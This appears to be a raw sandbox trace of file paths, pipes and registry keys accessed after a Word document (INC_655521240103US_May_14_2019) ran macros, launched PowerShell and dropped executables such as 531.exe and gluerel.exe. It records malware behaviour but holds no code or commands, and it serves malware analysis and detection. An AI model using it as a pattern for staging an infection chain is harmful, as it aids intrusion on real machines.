C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE.config
C:\Program Files (x86)\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL
C:\Users\user\AppData\Roaming\Microsoft\Templates
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39F9907-C8C6-4EF6-94D3-79DF1B9337A2}.tmp
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\Windows
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\desktop.ini
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC
C:\Users\user\AppData\Local\Temp\~DFABD4D4152FD0DE55.TMP
C:\Program Files (x86)\Microsoft Office\Office14\GKWord.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22959652-52D5-44BE-B483-E544AA5735B7}.tmp
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\USP10.DLL
C:\Program Files (x86)\Microsoft Office\Office14\MSWORD.OLB
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0960D407-C226-4B14-8EF4-4D7DE39EC6D6}.tmp
C:\Windows\SysWOW64\FM20.DLL
C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\VBE7.DLL\3
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8588CCBC.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47E14D8D.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE1C1E2A.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8C4423.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB067C8.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66D6F529.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF99C916.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7413FA1F.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B30D94.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EF4A885.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F28E8CC2.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC4471DB.wmf
C:\Windows\System32\wbem\wbemdisp.tlb
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\arial.ttf
C:\Windows\Fonts\arialbd.ttf
C:\Windows\Fonts\ariali.ttf
C:\Windows\Fonts\arialbi.ttf
C:\Program Files (x86)\Microsoft Office\Office14\msproof7.dll
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
C:\Program Files (x86)\Microsoft Office\Office14\PROOF\1033\MSGR3EN.DLL
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.BUD
C:\Windows\sysnative\spool\drivers\x64\3\sendtoonenote.gpd
C:\Windows\sysnative\spool\drivers\x64\3\stdnames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteNames.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNoteFilter.gpd
C:\Windows\sysnative\spool\drivers\x64\3\SendToOneNote.ini
C:\Windows\sysnative\wbem\WmiPrvSE.exe
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Windows\sysnative\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk\desktop.ini
C:\Windows\sysnative\WindowsPowerShell\v1.0\en-US\powershell.exe.mui
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell
\??\PIPE\srvsvc
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\WindowsPowerShell
C:\Windows\sysnative\WindowsPowerShell\v1.0
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF9JT9UPQS3TEN97KVRT.temp
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\msvcr80.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_64\index169.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni.dll
C:\Windows\sysnative\l_intl.nls
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni.dll
C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\GetEvent.types.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\types.ps1xml
C:\Windows\sysnative\tzres.dll
C:\Windows\sysnative\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\WSMan.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Certificate.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\FileSystem.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Help.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml
C:\Windows\sysnative\WindowsPowerShell\v1.0\Registry.format.ps1xml
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni.dll
C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni.dll
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppobjs-spp-plugin-manifest-signed.xrm-ms
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPOBJS.DLL
C:\Windows\sysnative\dnsapi.dll
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat
\??\pci#ven_8086&dev_100f&subsys_075015ad&rev_01#4&3ad87e0a&0&0888#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{6aee89dd-bcbc-4329-b07b-c7eec7efd7ec}
\??\root#*6to4mp#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{fe09e92d-e089-4750-ba5d-f1dc277d4029}
\??\root#*isatap#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{20ae6bf1-f960-4e04-a1f8-4706fc316b77}
\??\root#ms_agilevpnminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{29898c9d-b0a4-4fef-bdb6-57a562022cee}
\??\root#ms_l2tpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{e43d242b-9eab-4626-a952-46649fbb939a}
\??\root#ms_ndiswanbh#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanbh
\??\root#ms_ndiswanip#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanip
\??\root#ms_ndiswanipv6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\ndiswanipv6
\??\root#ms_pppoeminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{8e301a52-affa-4f49-b9ca-c79096a1a056}
\??\root#ms_pptpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{df4a9d2c-8742-4eb1-8703-d395c4183f33}
\??\root#ms_sstpminiport#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{71f897d7-eb7c-4d8d-89db-ac80d9dd2270}
\??\root#system#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{eeab7790-c514-11d1-b42b-00805fc1270e}&asyncmac
\??\sw#{eeab7790-c514-11d1-b42b-00805fc1270e}#asyncmac#{ad498944-762f-11d0-8dcb-00c04fc3358c}\{78032b7e-4968-42d3-9f37-287ea86c0aaa}
C:\Windows\sysnative\Tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask
\Device\LanmanDatagramReceiver
C:\Windows\SysWOW64\sc.exe
C:\Windows\SysWOW64\
C:\Windows\SysWOW64\en-US\sc.exe.mui
C:\Windows\SysWOW64\gluerel.exe
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Users\user\531.exe
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7531C624-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Users\user\AppData\Local\Temp\~DF80447823E3B1CDC0.TMP
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7531C625-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Users\user\AppData\Local\Temp\~DF3CDA1F11F8A81DB4.TMP
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\favicon[1].ico
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\frameiconcache.dat
C:\Users\user\AppData\Local\Microsoft\Feeds Cache\index.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
\??\PIPE\samr
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc:Zone.Identifier
C:\Users\user\AppData\Local\Temp\CVR867E.tmp.cvr
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39F9907-C8C6-4EF6-94D3-79DF1B9337A2}.tmp
C:\Users\user\AppData\Local\Microsoft\Office\Word14.customUI
C:\Users\user\AppData\Local\Temp\~DFABD4D4152FD0DE55.TMP
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\~$C_655521240103US_May_14_2019[1].doc
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{22959652-52D5-44BE-B483-E544AA5735B7}.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0960D407-C226-4B14-8EF4-4D7DE39EC6D6}.tmp
C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8588CCBC.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47E14D8D.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE1C1E2A.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D8C4423.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB067C8.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\66D6F529.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF99C916.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7413FA1F.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B30D94.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EF4A885.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F28E8CC2.wmf
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC4471DB.wmf
C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\INDEX.BTR
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\sysnative\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
\??\PIPE\srvsvc
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF9JT9UPQS3TEN97KVRT.temp
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\user\531.exe
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
\Device\LanmanDatagramReceiver
C:\Windows\appcompat\Programs\RecentFileCache.bcf
C:\Windows\SysWOW64\gluerel.exe
C:\Users\user\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7531C625-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7531C624-7656-11E9-A15D-000C29BA3DA7}.dat
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R8OP9ZJC\INC_655521240103US_May_14_2019[1].doc
C:\Users\user\AppData\Local\Temp\CVR867E.tmp
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47E14D8D.wmf
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Word_restart.xml
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BF9JT9UPQS3TEN97KVRT.temp
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.308.14888764
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.308.14888764
C:\Users\user\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.308.14888764
C:\Windows\SysWOW64\dafpanes.exe
C:\Users\user\531.exe
C:\Windows\SysWOW64\gluerel.exe:Zone.Identifier
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\Software\Microsoft\DirectUI
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\AdminActive
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7531C624-7656-11E9-A15D-000C29BA3DA7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\GipActivityBypass
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1AC7516E-E6BB-4A69-B63F-E841904DC5A6}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{7673B35E-907A-449D-A49F-E5CE47F0B0B2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7673B35E-907A-449D-A49F-E5CE47F0B0B2}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{7673B35E-907A-449D-A49F-E5CE47F0B0B2}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\Groups
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\EnabledScopes
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Feeds
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Feeds
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Search
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Search\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\IE8RunOnceLastShown
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\IE8RunOnceLastShown
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Security\DisableFixSecuritySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1000
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1000
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1000
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Position
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FullScreen
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\IEAK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\IEAK
HKEY_CURRENT_USER\Software\Classes\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF50}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF50}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF50}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\ConfiguredScopes
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\User Favorites Path
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\WindowsSearch\UpgradeTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Migration
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Migration\IE Installed Date
HKEY_CURRENT_USER\Software\Classes\Interface\{AB310581-AC80-11D1-8DF3-00C04FB6EF55}
